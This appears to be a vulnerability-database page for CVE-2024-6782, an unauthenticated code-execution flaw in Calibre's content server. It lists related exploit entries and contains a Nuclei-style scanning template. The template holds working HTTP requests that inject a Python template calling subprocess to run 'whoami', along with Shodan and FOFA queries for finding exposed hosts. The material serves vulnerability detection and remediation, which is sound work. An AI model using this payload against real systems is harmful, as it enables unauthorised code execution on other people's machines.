| Reporter | Title | Published | Views | Family All 32 |
|---|---|---|---|---|
| Calibre 7.15.0 Python Code Injection Exploit | 8 Aug 202400:00 | – | zdt | |
| Exploit for CVE-2024-6782 | 15 Sep 202418:45 | – | githubexploit | |
| Exploit for CVE-2024-6782 | 15 Sep 202418:45 | – | githubexploit | |
| Exploit for CVE-2024-6782 | 9 Aug 202406:25 | – | githubexploit | |
| Exploit for CVE-2024-6782 | 6 Aug 202415:31 | – | githubexploit | |
| The vulnerability of the Calibre e-book library software, related to deficiencies in authentication mechanisms, allows a perpetrator to execute arbitrary code. | 21 Aug 202400:00 | – | bdu_fstec | |
| CVE-2024-6782 | 6 Aug 202407:28 | – | circl | |
| Calibre Access Control Error Vulnerability | 9 Aug 202400:00 | – | cnvd | |
| CVE-2024-6782 | 6 Aug 202403:39 | – | cve | |
| CVE-2024-6782 Calibre Remote Code Execution | 6 Aug 202403:39 | – | cvelist |
| Source | Link |
|---|---|
| starlabs | www.starlabs.sg/advisories/24/24-6781/ |
id: CVE-2024-6782
info:
name: Calibre <= 7.14.0 Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
impact: |
Unauthenticated attackers can execute arbitrary Python code through the content server's template functionality, achieving complete system compromise.
remediation: |
Update Calibre to version 7.15.0 or later to address the remote code execution vulnerability.
reference:
- https://starlabs.sg/advisories/24/24-6781/
classification:
cve-id: CVE-2024-6782
cwe-id: CWE-863
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
epss-score: 0.83393
epss-percentile: 0.99645
cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: calibre-ebook
product: calibre
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-request: 2
tags: cve,cve2024,calibre,rce,vuln,vkev
http:
- raw:
- |
GET /interface-data/books-init HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}
extractors:
- type: json
name: book_ids
internal: true
json:
- '.search_result.book_ids[0]'
- raw:
- |
POST /cdb/cmd/list HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
[
["template"],
"",
"",
"",
{{book_ids}},
"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n except Exception:\n return subprocess.check_output(['sh', '-c', 'whoami'])\n"
]
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "b'([^']+)"
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022100d1d481693e1f0381e2d2daf5a526cad4620f9c02659519e3b539bfb14f30e64702204a4b974fd6f4bfe90b70889fd62ca4756b3e44dc4455ec941b254454ce9234bf:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation